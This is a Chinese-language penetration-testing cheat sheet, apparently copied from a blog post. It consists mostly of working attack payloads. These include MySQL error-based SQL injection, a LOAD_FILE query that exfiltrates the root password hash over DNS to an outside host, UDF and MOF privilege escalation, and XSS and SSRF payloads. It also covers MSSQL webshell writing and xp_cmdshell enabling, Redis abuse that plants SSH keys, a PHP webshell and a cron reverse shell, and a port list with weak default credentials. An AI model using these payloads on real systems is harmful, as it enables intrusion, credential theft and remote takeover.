攻击者通过构造一些恶意的SQL语句,让后台的数据库去解析,从而达到入侵目标网络,获取敏感信息
mysql> select * from users where id = 1 and (select 1 from (select count(*),concat(0x7e,database(),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)b);
mysql> select * from users where id = 1 and updatexml(1,concat(0x7e,database(),0x7e),1);
mysql> select * from users where id = 1 and extractvalue(1,concat(0x7e,database(),0x7e));
ps:如果concat被过滤,则可能使用make_set函数来实现
mysql> select * from users where id = 1 and updatexml(1,make_set(3,0x7e,database()),1);
mysql> select * from users where id = 1 and extractvalue(1,make_set(3,0x7e,database()));
mysql> select * from(select * from users a join users b)c;
and geometrycollection((select * from(select * from(select user())a)b));
select exp(~(select*from(select database())x));
and (select count(*) from mysql.user)>0 /*如果结果返回正常,说明具有读写权限.*/
and (select count(*) from mysql.user)>0 /*返回错误,应该是管理员给数据库账户降权了*/
高版本的MYSQL添加了一个新的特性secure_file_priv
先执行了sql语句,再把参数传入,即使参数有sql命令也不会被执行
必须是Windows系统,使用的load_file函数
SELECT LOAD_FILE(CONCAT(‘\\\\‘,(SELECT password FROM mysql.user WHERE user=‘root‘ LIMIT 0,1),‘.b182oj.ceye.io\\abc’));
udf提权
create function shell returns string soname ‘udf.dll‘
mof提权
1. <javascript>
2. <iframe src=http://xxxx.xx>
3. <img src=javascript:alert(‘xss‘)>
4. <body οnlοad=alert(‘xss‘)>
5. <body background=javascript:alert(‘xss‘)>
6. <input type="image" src="javascript:alert(‘xss‘)">
7. ...
<a href=javascript:alert(‘/a/‘)>adas</a>
<math>标签
<embed>标签
如 10.0.0.1.Xip.io = 10.0.0.1
127.0.0.1 = 2130706433D = 7F000001
dict://<user-auth>@<host>:<port>/d:<word>
ssrf.php?url=sftp://example.com:11111/
ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
backup database 库名 to disk = ‘c:\aa.bak‘;--
create table [dbo].[dtest] ([cmd] [image]);-- insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
backup database test to disk=‘c:\aa.bak‘ WITH DIFFERENTIAL,FORMAT;--
EXEC sp_configure ‘show advanced options‘, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell‘, 1;RECONFIGURE;
exec master..xp_cmdshell ‘whoami‘
EXEC sp_configure ‘show advanced options‘, 0;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell‘, 1;RECONFIGURE;
$ssh-keygen –t rsa
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
$ redis-cli -h 192.168.1.11
$ 192.168.1.11:6379> config set dir /root/.ssh/
OK
$ 192.168.1.11:6379> config get dir
1) "dir"
2) "/root/.ssh"
$ 192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
$ 192.168.1.11:6379> save
OK
config set dir /home/wwwroot/default/
config set dbfilename redis.php
set webshell "<?php phpinfo(); ?>”
save
# redis-cli -h 192.168.1.20
192.168.1.20:6379>CONFIG SET dir /var/spool/cron
OK
192.168.1.20:6379>CONFIG SET dbfilename root
OK
192.168.1.20:6379>set payload "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.1.160/9999 0>&1\n\n"
OK
192.168.1.20:6379>save
OK
192.168.1.20:6379>exit
端口 | 服务 | 说明 |
---|---|---|
21 | FTP | 主要看是否支持匿名,也可跑弱口令 |
22 | SSH | 弱口令爆破 |
23 | Telnet | 弱口令爆破 |
80-90 | Web | 常见Web漏洞以及一些为管理后台 |
135 | RPC | 通过远程调用执行代码 |
137 | NetBIOS | 获取目标计算机的相关信息 |
161 | Snmp | public弱口令 |
389 | Idap | 是否为匿名访问 |
443 | Openssl | 心脏出血以及一些Web漏洞测试 |
445 | Smb | 跑弱口令,检测是否有ms_08067等溢出 |
873 | Rsync | 是否为匿名访问,也可以跑弱口令 |
1025 | Listen port | 获取Windows网络的服务器信息与用户信息 |
1099 | Java rmi | 远程命令执行漏洞 |
1433 | Mssql | 弱口令爆破 |
1521 | Oracle | 弱口令爆破 |
2082/2083 | Cpanel主机管理系统登录 | 弱口令爆破 |
2222 | DA虚拟主机管理系统登录 | 默认密码zebra |
2601/2604 | zebra路由器 | 说明 |
3128 | Squid代理默认端口 | 如果没设置口令很可能 就直接漫游内网 |
3306 | Mysql | 弱口令爆破 |
3312/3311 | Kangle主机管理系统登陆 | 说明 |
3389 | RDP | 弱口令爆破,SHIFT后门,放大镜,输入法漏洞 |
4440 | Rundeck | Web |
4848 | GlassFish | Web中间件 弱口令admin/adminadmin |
5432 | Postgres | 弱口令爆破 |
5560/7778 | iSqlPlus | |
5900/5901/5902 | Vnc | 弱口令爆破 |
6379 | Redis | 一般无验证,直接访问 |
7001/7002 | Weblogic | 弱口令爆破 |
7778 | Kloxo主机控制面板登录 | |
8080 | Tomcat/Jboss | 弱口令爆破,jboss后台可能不验证 |
8649 | Ganglia | |
8080-8090 | 常见WEB端口 | |
8888 | Amh/LuManager 主机管理系统默认端口 | 说明 |
9000 | Fcgi | fcgi php命令执行漏洞 |
9200 | Elasticsearch | 代码执行 |
9043 | Websphere | 弱口令爆破 |
10000 | Virtualmin/Webmin 服务器虚拟主机管理系统 | |
11211 | Memcache | 内存泄露 |
27017/28017 | Mongodb | 未授权访问 |
50060/50030 | Hadoop | WEB |
XXE全称XML外部实体注入(XML External Entity)形成的原因大都是由于允许引用外部实体。
正向代理
就是client连上server,然后把server能访问的机器地址和端口(当然也包括server自己)镜像到client的端口上。
反向代理
就是client连上server,然后把client能访问的机器地址和端口(也包括client自己)镜像到server的端口上。
用ssh做socks代理
ssh -D [本地IP或省略]:[本地端口] [登陆服务器的用户名@服务器IP] -p [服务器ssh服务端口(默认22)]
区别
原文:https://www.cnblogs.com/lgj8/p/12823502.html